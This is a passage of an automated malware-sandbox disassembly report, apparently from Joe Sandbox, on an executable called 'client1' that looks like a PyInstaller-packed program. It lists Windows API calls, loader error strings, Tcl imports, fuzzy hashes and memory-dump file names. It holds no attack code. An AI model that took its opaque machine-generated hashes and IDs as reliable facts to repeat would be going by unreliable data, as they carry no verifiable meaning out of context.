libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 2238633743-1453502826
                                                    • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction ID: b30a9a20e4738194fb40c84eba7b36943a02debceca7de32295cc50003b78bbb
                                                    • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction Fuzzy Hash: AAE1D760A09B8390FA75FB35A9941F4E3BFAF047A4BD45135C82E46764EF7CA5488332
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction ID: 1fb5cea2d22745308a5aad75a2ecaaeb968f502ae9f829d35afa07a1d340ab56
                                                    • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                    • Instruction Fuzzy Hash: 2D5106266187E186E634AF32A4581FAF7A2F798B65F004121EFDE83684DF3CD045DB20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction ID: 3ec97ae38e25c2ae4738682ddf7c8afc54605f162cdf39b16da1d5dd63216689
                                                    • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                    • Instruction Fuzzy Hash: 3A129661E0C3C396FB30BA24E1542FEF69BEB80758FD44035D6A9465C9DBBCE5488B60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
                                                    • Opcode ID: c48cb496368e60cd6cc9da65db67046a9100ebb4916df9b08028bbbb2119c3d9
                                                    • Instruction ID: 5127a553522058f030d11232e604bcacd8dff4058a98ad03220e3a6ef4e4d023
                                                    • Opcode Fuzzy Hash: c48cb496368e60cd6cc9da65db67046a9100ebb4916df9b08028bbbb2119c3d9
                                                    • Instruction Fuzzy Hash: 76416121B0D7C281EE34FB25E8402E9E3AAFB44794FD44431DE6D87A55EE3CE5418311
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction ID: d469534b6d766c56f50ee888696afe158bf8c955f0a15cc318a51780828034a7
                                                    • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction Fuzzy Hash: 5BE1B372A0878186EB30AF35D8402EDB7A9FB54798F900535EE9D87B95CF38E091C752
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,00000262AABC6A48,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF34
                                                    • GetProcAddress.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,00000262AABC6A48,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction ID: c546f838c425362f3399e95c05d1f801b7d962b554382e889ded803afc47e86f
                                                    • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction Fuzzy Hash: AF412321B19B9681FA32BB32AC005F5A69BBF14BA0F894235DD2D47788DE7CF405C220
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F62769F
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F6276EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 626452242-27947307
                                                    • Opcode ID: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                    • Instruction ID: 33d6bd8a595d56ce9ed342310b45cadffa52998b593ac2e599da2ee738bada72
                                                    • Opcode Fuzzy Hash: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                    • Instruction Fuzzy Hash: BB414F32A08BC286DA30EF25B8405EAE7AAFB84790F944135DEAD87B95DF7CD451C710
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627B81
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 3723044601-27947307
                                                    • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction ID: 1e8ce1385f1be308a713286a7656a1a1fe8cec77417bdd035004f334b6dd1b24
                                                    • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction Fuzzy Hash: 0D215E71B08B8285EB20BF35AC400F9B66ABB84B90F944535DA6D83754EF7CE5518321
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$p$p
                                                    • API String ID: 3215553584-1995029353
                                                    • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction ID: ed817100ff1da9d17aa66b1a47bd593b9df385f9632904351ed2d35c52c4c5df
                                                    • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction Fuzzy Hash: 3C127261E0D3D346FB347A35D0542FAF6ABEB82754FC84035D6A9466C8DABCE5809F20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 626452242-876015163
                                                    • Opcode ID: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                    • Instruction ID: 55a2a91df314643ba3e8a6174a936a3bd340f2ea85152a7226c0593ebf60e84f
                                                    • Opcode Fuzzy Hash: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                    • Instruction Fuzzy Hash: 12416232A08B8286E630FF35A8405F9E7AAFB44790F945235DA6D87BA4DF3CD452C711
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF6D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF7B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFA5
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFEB
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction ID: d7c5080cdd8f26468dbd7bdde6db1f1dbefc9b6bdc914f9bdde3b44db8140bda
                                                    • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction Fuzzy Hash: E131A121A1A78291FE71BF22AC005F5A2AAFF08BB4F994535DD2D87390DF3CE5458721
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79F6267CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF79F6264DF
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79F6264F3
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79F62653A
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79F6264B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    • API String ID: 1662231829-3498232454
                                                    • Opcode ID: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                    • Instruction ID: 10210cae02a5da7580aa32472d1a66e78c26cbe670e770a5c560e5b427f1dcde
                                                    • Opcode Fuzzy Hash: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                    • Instruction Fuzzy Hash: 9E315E11B187C240FA30BB31E9552FAD25AAF98784FC40431DA6E96BDAEE2DE5048721
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 3723044601-876015163
                                                    • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction ID: 9f2e00563ab7892172867902b63dd349e0876b4b8af7bc4b5835a1d096cd09be
                                                    • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction Fuzzy Hash: 77214422B08B8281EB60FB35F8400E9E366FF85794F944531DB6C93BA9EF2DD5418710
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A62F
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A644
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A665
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A692
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6B4
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6CF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                    • Instruction ID: 7d43b17c794f12c4ac64cc17aac40b9b2e6bd3271b368f03124712aa789b55af
                                                    • Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                    • Instruction Fuzzy Hash: 8E213824E0C7D242FA78B73156511FAE24B5F56BB0F840734E83E07AD6DEADB400A630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction ID: 810f57fa96b3e569063fe0804fcb4f4afbcab54fabd34b9d9e30289ec406c851
                                                    • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction Fuzzy Hash: D9118421718B8286F760BB22E854369B7AAFB58FE4F840234D96D87794CF3CD404C750
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7A7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7DD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A80A
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A81B
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A82C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A847
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
